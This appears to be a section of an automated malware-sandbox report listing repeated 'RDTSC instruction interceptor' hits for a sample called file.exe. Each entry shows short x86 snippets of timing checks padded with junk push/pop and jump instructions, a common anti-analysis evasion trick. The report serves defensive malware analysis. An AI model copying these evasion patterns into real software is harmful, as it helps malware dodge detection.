Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12585FD second address: 1258648 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F76D9275004h 0x00000008 jmp 00007F76D9275007h 0x0000000d pop esi 0x0000000e pushad 0x0000000f jmp 00007F76D9275009h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1258648 second address: 125864E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125939D second address: 12593A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 jne 00007F76D9274FF6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125953B second address: 1259564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D60518h 0x00000009 jne 00007F76D8D60508h 0x0000000f push eax 0x00000010 pop eax 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12596CC second address: 12596E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007F76D9275002h 0x0000000b push eax 0x0000000c push edx 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12596E9 second address: 12596ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125DF4D second address: 125DF51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125E0CC second address: 125E0D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push edx 0x0000000a pop edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125E0D9 second address: 125E0DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125E0DF second address: 125E0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125E0E5 second address: 125E0EA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125E211 second address: 125E216 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125E38B second address: 125E391 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125E391 second address: 125E3A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jnl 00007F76D8D60506h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125EAB3 second address: 125EAB8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 125EDED second address: 125EDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1262664 second address: 126266E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F76D9274FF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126266E second address: 126267C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D6050Ah 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1261F12 second address: 1261F39 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F76D9274FF6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F76D9275002h 0x00000011 push edi 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 pop edi 0x00000017 push edi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1268657 second address: 126868E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push edx 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jno 00007F76D8D60506h 0x00000011 jmp 00007F76D8D60515h 0x00000016 popad 0x00000017 jmp 00007F76D8D60510h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1267FE2 second address: 1267FE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1267FE6 second address: 1267FEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1267FEA second address: 1267FF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126E0F6 second address: 126E0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126E0FF second address: 126E105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126E105 second address: 126E10F instructions: 0x00000000 rdtsc 0x00000002 js 00007F76D8D60506h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126E10F second address: 126E115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126E115 second address: 126E127 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F76D8D60508h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126E127 second address: 126E13B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jbe 00007F76D9274FF6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jbe 00007F76D9274FFCh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126E13B second address: 126E13F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126C8C6 second address: 126C8F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F76D9275009h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F76D9275000h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126CA88 second address: 126CA8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126CA8E second address: 126CA92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126CC23 second address: 126CC33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F76D8D60506h 0x0000000a jne 00007F76D8D60506h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126CC33 second address: 126CC37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126CED7 second address: 126CEF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D60517h 0x00000009 pop edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126CEF3 second address: 126CEF9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126CEF9 second address: 126CF19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60512h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push ecx 0x00000010 pushad 0x00000011 popad 0x00000012 pop ecx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 121D2D2 second address: 121D2D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126D334 second address: 126D346 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D6050Ch 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126D346 second address: 126D368 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F76D9275009h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126D368 second address: 126D38E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 jno 00007F76D8D60506h 0x0000000f jmp 00007F76D8D60515h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126D38E second address: 126D397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126D397 second address: 126D39B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 126D39B second address: 126D3A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127114D second address: 1271153 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1271153 second address: 1271157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12712AB second address: 12712B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12712B3 second address: 12712C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F76D9274FF6h 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12712C3 second address: 12712DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 jmp 00007F76D8D6050Eh 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12712DF second address: 12712E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12712E3 second address: 12712EB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1271419 second address: 1271422 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1271422 second address: 1271426 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1271426 second address: 1271435 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9274FFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1271435 second address: 1271460 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60510h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F76D8D60515h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1271460 second address: 127146D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127146D second address: 1271476 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12715EC second address: 12715F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12715F0 second address: 12715F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12715F4 second address: 12715FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12715FA second address: 1271633 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F76D8D6050Ch 0x00000008 jmp 00007F76D8D60514h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 jmp 00007F76D8D60511h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12717DD second address: 12717E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1278D27 second address: 1278D2C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12794C2 second address: 12794CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edi 0x0000000a pop edi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127A3A3 second address: 127A3B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F76D8D60506h 0x0000000a pop edx 0x0000000b jnc 00007F76D8D6050Ah 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127A3B8 second address: 127A3D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F76D9275004h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127A3D2 second address: 127A3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127A675 second address: 127A679 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 127A679 second address: 127A67F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128255A second address: 1282560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282560 second address: 1282570 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D6050Bh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282570 second address: 1282576 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282576 second address: 128257A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 128257A second address: 1282587 instructions: 0x00000000 rdtsc 0x00000002 js 00007F76D9274FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282A1C second address: 1282A20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282A20 second address: 1282A24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282A24 second address: 1282A30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F76D8D60506h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282A30 second address: 1282A47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F76D9275001h 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282A47 second address: 1282A86 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F76D8D60506h 0x00000008 jmp 00007F76D8D60518h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jmp 00007F76D8D60513h 0x0000001b push edx 0x0000001c pop edx 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282A86 second address: 1282A90 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1282BD9 second address: 1282BE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1288BFA second address: 1288C35 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275003h 0x00000007 jmp 00007F76D9274FFEh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F76D9275002h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1288C35 second address: 1288C39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1288C39 second address: 1288C3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289053 second address: 1289059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289059 second address: 1289069 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jg 00007F76D9274FF6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289069 second address: 1289089 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007F76D8D60514h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289089 second address: 12890A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9274FFBh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d js 00007F76D9274FF6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12890A2 second address: 12890A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12894EE second address: 12894F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289923 second address: 1289927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289927 second address: 1289942 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F76D9274FFEh 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 pop edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289A80 second address: 1289A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289A84 second address: 1289A98 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F76D9274FF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edi 0x0000000d pop edi 0x0000000e jg 00007F76D9274FF6h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1289A98 second address: 1289AB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D8D60514h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jng 00007F76D8D60506h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1292156 second address: 1292166 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F76D9274FF6h 0x0000000a popad 0x0000000b pushad 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1291CEE second address: 1291D0E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jbe 00007F76D8D60506h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F76D8D60511h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1291D0E second address: 1291D2E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F76D9275008h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1291D2E second address: 1291D38 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F76D8D60506h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12937A0 second address: 12937D7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F76D927500Ah 0x00000008 jns 00007F76D9274FFCh 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jbe 00007F76D9275019h 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A31AE second address: 12A31D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F76D8D60516h 0x00000009 popad 0x0000000a pushad 0x0000000b jnp 00007F76D8D60506h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 12A2D69 second address: 12A2D6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
